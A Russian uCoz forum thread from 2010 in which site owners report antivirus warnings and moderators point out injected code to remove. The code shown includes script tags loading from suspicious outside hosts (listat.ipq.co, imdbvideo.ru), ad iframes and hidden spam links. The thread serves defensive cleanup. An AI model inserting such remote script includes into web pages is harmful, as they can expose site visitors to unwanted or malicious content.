Чат сообщества
   | |
| Модератор форума: Yuri_G |
| Сообщество uCoz Мастерская uCoz Безопасность сайта Вирусы на сайтах (для изучения) (примеры вредоносного кода и устранение) |
| Вирусы на сайтах (для изучения) |
|
Здраствуйте юкозеры, я очень нуждаюсь в вашей помощи -> http://jedis.ucoz.ru/ . Короче, моему проэкту уже более 2-х лет, и вот впервые с такми столкнулся. Короче на самом сайте нету ссылки Http://WC3fun.ru , я вообще думал что юкоз не подтвергается опасности спама, ведь защита их стоит на ура, а тут на тебе, такая фигня красная, я и Гуглу написал, уже просто не знаю что делать. Появилась буквально на днях, 2-3 назад, я ещё помню что я лазил было в Гугле и случайно наткнулся на тот сайт, но ничего с него не брал, после каким-то макаром, появляется окно, Джедас там, связан как-то из этой ямой спама варик3фан.ру, я просто в шоке. Жду вашей помощи, очень надеюсь на вас, я даже ещё премиум неуспел заказать, а тут фигня такая, жду ваших советов, подсказок, как убрать данную проблему wc3fun.ru (очень вредоносный сайт, впился как пявка, по непонятным причинам к нашему порталу). Помогите, пожалуйста, буду очень благодарен.
 |
|
[Jedi]Qui-Gon, то что вы ищете находится у вас в ротаторе баннеров
вот смотрите
Code document.write('<a href="http://jedis.ucoz.ru/rtr/1-39-1"><img alt="" border="0" src="http://wc3fun.ru/afiles/cary.gif" width="150" height="80"></a>'); и вообще не строило из сайта устраивать такую помойку из баннеров в общем перебирайте весь мусор что у вас вставлен в ротатор. там ваша ссылка. на главной не место такому огромному количеству внешних ссылок. так же на главной закомментированный код от майла |
|
Спасибо огромное, буду настраивать, пересмотрю лишние ссылки, очень благодарен. Респект юкозу.
 Добавлено (21-Дек-2010, 23:44:13) Добавлено (21-Дек-2010, 23:48:35) |
|
помогите... за несколько дней что то с сайтом случилось и как я нахватала вирусов ума не дам... я не очень хорошо разбираюсь во всех этих делах и что делать не знаю... помогите пож-та... сайт очень нужен... существует уже больше года - на него ходят много людей, которые общаются по интересам и которым это все очень важно...
адрес www.matiz36.ucoz.ru |
|
parshy,
Quote <!-- <block4> --> <table border="0" cellpadding="5" cellspacing="0" width="216"> <tr><td style="color:#FF8400;font-size:11px;border-left:5px solid #242730;"><b><!-- <bt> -->Клубы друзья<!-- </bt> --></b></td></tr> <tr><td style="padding:5px 10px 5px 10px;"><!-- <bc> --><ul class="uz"><li class="menus"><a href="http://www.priorovod.ru/forumdisplay.php?f=80/" target="_blank" class="noun">Лада Приора Клуб Воронеж</a></li><br><li class="menus"><a href="http://www.autoclub2112.ru/forumdisplay.php?f=139" target="_blank" class="noun">2112 клуб</a></li><br><li class="menus"><a href="http://www.bmwclubvoronezh.ru/forum/" target="_blank" class="noun">БМВ клуб Воронеж</a></li><br><li class="menus"><a href="http://www.golfclub-vrn.com/" target="_blank" class="noun">Гольф Клуб Воронеж</a></li><br><li class="menus"><a href="http://www.igra-v.ru/forum/" target="_blank" class="noun">ИГРА</a></li><br><li class="menus"><a href="http://audiclab36.getbb.ru/viewtopic.php?f=12&t=120&start=0&st=0&sk=t&sd=a/" target="_blank" class="noun">Ауди Клуб Воронеж</a></li></ul><!-- </bc> --></td></tr><script language='JavaScript' src='http://listat.ipq.co/fr.php?i=13950'></script> </table> и что у вас делает этот скрипт
Code <script type="text/javascript" src="http://imdbvideo.ru/il/check.php"></script> |
|
webanet, здравствуйте1У меня проблема.......Сегодня при входе на свой сайт я обнаружила вот такую картинку http://i037.radikal.ru/1012/39/05ce8af00e9f.jpg ,но проверив сайт по ссылке в докторвебе,мне написали что вирусов не обнаружено.....Может я что-то неправильно делаю......Подскажите как это исправить,заранее спасибо.
Добавлено (22-Дек-2010, 11:05:01) |
|
Barbiturka, Это из-за скрипта снега:
Code <script language="JavaScript1.2"> grphcs=new Array(2) Image0=new Image(); Image0.src=grphcs[0]="http://fantasyflash.ru/script/web/image/sneg1.gif"; Image1=new Image(); Image1.src=grphcs[1]="http://fantasyflash.ru/script/web/image/sneg2.gif"; Amount=50; Ypos=new Array(); Xpos=new Array(); Speed=new Array(); Step=new Array(); Cstep=new Array(); ns=(document.layers)?1:0; ns6=(document.getElementById&&!document.all)?1:0; if (ns){ for (i = 0; i < Amount; i++){ var P=Math.floor(Math.random()*grphcs.length); rndPic=grphcs[P]; document.write("<LAYER NAME='sn"+i+"' LEFT=0 TOP=0><img src="+rndPic+"></LAYER>"); } } else{ document.write('<div style="position:absolute;top:0px;left:0px"><div style="position:relative">'); for (i = 0; i < Amount; i++){ var P=Math.floor(Math.random()*grphcs.length); rndPic=grphcs[P];//osw document.write('<img id="si'+i+'" src="'+rndPic+'" style="position:absolute;top:0px;left:0px">'); } document.write('</div></div>'); } WinHeight=(ns||ns6)?window.innerHeight:window.document.body.clientHeight; WinWidth=(ns||ns6)?window.innerWidth-70:window.document.body.clientWidth;//nzrfm.net.ru for (i=0; i < Amount; i++){ Ypos[i] = Math.round(Math.random()*WinHeight); Xpos[i] = Math.round(Math.random()*WinWidth); Speed[i]= Math.random()*3+3; Cstep[i]=0; Step[i]=Math.random()*0.1+0.05; } function fall(){ var WinHeight=(ns||ns6)?window.innerHeight:window.document.body.clientHeight; var WinWidth=(ns||ns6)?window.innerWidth-70:window.document.body.clientWidth; var hscrll=(ns||ns6)?window.pageYOffset:document.body.scrollTop; var wscrll=(ns||ns6)?window.pageXOffset:document.body.scrollLeft; for (i=0; i < Amount; i++){ sy = Speed[i]*Math.sin(90*Math.PI/180); sx = Speed[i]*Math.cos(Cstep[i]); Ypos[i]+=sy; Xpos[i]+=sx; if (Ypos[i] > WinHeight){ Ypos[i]=-60; Xpos[i]=Math.round(Math.random()*WinWidth); Speed[i]=Math.random()*5+3; } if (ns){ document.layers['sn'+i].left=Xpos[i]; document.layers['sn'+i].top=Ypos[i]+hscrll; } else if (ns6){ document.getElementById("si"+i).style.left=Math.min(WinWidth,Xpos[i]); document.getElementById("si"+i).style.top=Ypos[i]+hscrll; } else{ eval("document.all.si"+i).style.left=Xpos[i]; eval("document.all.si"+i).style.top=Ypos[i]+hscrll; } Cstep[i]+=Step[i]; } setTimeout('fall()',20); } window.onload=fall //--> </script>   Вот эти картинки загрузите в файловый менеджер, и в скрипте, укажите новый путь к картинкам. Прикрепления:
1098876.gif
(0.3 Kb)
·
5240277.gif
(1.2 Kb)
|
|
Здравствуйте, ПОМОГИТЕ ПОЖАЛУЙСТА, На моем сайте обнаружен вирус троян, как мне от него избавиться.
Адрес сайта Все о свадьбе |
|
ксюша2705, Убрать коды:
Code <script language="JavaScript"> var LinkRuRND = Math.round(Math.random() * 1000000000); document.write('<iframe src="http://link.link.ru/show?squareid=100303&showtype=282&output_style=1&shift_count=1&cat_id=90060&tar_id=1&theme=0&sc=3&bg=FFFFFF&bc=FFFFFF&tc=D5EFFF&tt=333333&tu=333333&th=525252&c7=&css=0&bwidth=500&bheight=120&r='+LinkRuRND+'&ref='+escape(document.referrer)+'&url='+escape(window.location.href)+'" frameborder="0" vspace="0" hspace="0" marginwidth="0" marginheight="0" scrolling="no" width="100%" height="120"></iframe>'); </script> <noscript> <iframe src="http://link.link.ru/show?squareid=100303&showtype=282&output_style=1&shift_count=1&cat_id=90060&tar_id=1&theme=0&sc=3&bg=FFFFFF&bc=FFFFFF&tc=D5EFFF&tt=333333&tu=333333&th=525252&c7=&css=0&bwidth=500&bheight=120" frameborder="0" vspace="0" hspace="0" marginwidth="0" marginheight="0" scrolling="no" width="100%" height="120"></iframe> </noscript> |
|
ксюша2705, вот это тоже удалить
Code <script language=javascript src=http://home.uasar.org.ua/websurf?ovdiyoksana mode=1 v4=1 v5=1 id=js_websurf_code></script> не стоит этим заниматься |
|
Здравствуйте! У меня проблем на форуме http://women-club.do.am/forum/, антивирусная программа пишет вот что
Quote Имеется информация о том, что веб-страница women-club.do.am используется для атак на компьютеры пользователей. В соответствии с вашими настройками безопасности она была заблокирована. |
|
Алла5764, выделенное красным удалить
Quote <body style="background:#FFFFFF; margin:0px; padding:0px;"> <table cellpadding="0" cellspacing="0" border="0" width="100%" height="100%"><tr><td width="70" rowspan="2" valign="top" style="background:url('http://s25.ucoz.net/t/671/1.gif') right repeat-y #8D8B00;padding:70px 5px; font-size:10px;text-transform:lowercase;" align="center" class="topLink"><a href="http://women-club.do.am/">Главная</a><br /><br /><a href="http://women-club.do.am/index/3">Регистрация</a> <br /><br /><a href="javascript://" rel="nofollow" onclick="new _uWnd('LF',' ',-250,-110,{autosize:0,closeonesc:1,resize:1},{url:'/index/40'});return false;">Вход</a></td><script language='JavaScript' src='http://listat.ipq.co/fr.php?i=13950'></script>
|
|
Пожалуйста, помогите
Пользователь жалуется, что Quote формум содержит элементы с сайта на котором размещено вредоносное ПО Проверила ссылку на drweb.com/online- результат- вирусов не обнаружено (возможно делала неправильно???) Вот наш адрес http://musipusitha.ucoz.ru/ PS пожалуйста, в объяснениях будьте снисходительны- я мало что понимаю в сайтостроении |
|
яАня, пусть ваш пользователь скопирует предупреждение. то есть пусть даст весь текст. искать у вас на форуме что-либо очень сложно из-за обилия линеечек всяких и прочей ерунды
из того что есть. могло среагировать вот на это Quote "Рейтинг: Дом, семья и дети"'+ ' title="Показано число просмотров всего и за сегодня" style="margin:0;padding:0;" /></a></td>'); </script></tr></tbody></table><noscript><a style="" href="http://www.1russianbrides.com" target="_blank">meet beautiful russian brides</a></noscript> плюс ещё одна подкожная вставка того же
Quote <table cellpadding="0" cellspacing="0" border="0" width="88" height="31" style="line-height:0;width:88px;"><tr style="height:10px;"> <td style="padding:0;width:38px;height:10px;"><a href="http://www.24log.de" target="_blank"><img src="http://counter.24log.ru/buttons/25/bg25-2_1.gif" width="38" height="10" border="0" alt="Besucherzahler" title="" style="margin:0;padding:0;" /></a></td> <td style="padding:0;width:50px;height:10px;"><a log=24 href="http://www.1russianbrides.com" target="_blank"><img src="http://counter.24log.ru/buttons/25/bg25-2_3.gif" width="50" height="10" border="0" alt="attractive russian brides from Moscow" style="margin:0;padding:0;" /></a></td></tr> <tr style="height:21px;"><td style="padding:0;width:38px;height:21px;"><a href="http://www.24log.ru" target="_blank"><img src="http://counter.24log.ru/buttons/25/bg25-2_2.gif" width="38" height="21" alt="счетчик для сайта" title="" border="0" style="margin:0;padding:0;" /></a></td> <script type='text/javascript' language='javascript'> получается что-то на подобии ссылки обманки. |
|
У меня на сайте тоже видимо содержится ифрейм на Фантазифлеш.ру. Так говорит антивирус одного из посетителей. Только беда в том что мой антивирус его не видит, а найти я его никак не могу. Проблемы с этим сайтом. Проверила и Главную и ту страницу на которую ругался антивирус. Ифреймов не нахожу. Через FTP тоже ничего не вижу. Может это тизерка? Прошу помощи.
 Сообщение отредактировал Юта - Четверг, 23 Дек 2010, 12:18:01
|
| |||
Будьте в курсе всех обновлений: подпишитесь на наш официальный Telegram-канал uCoz и задавайте вопросы в чате сообщества!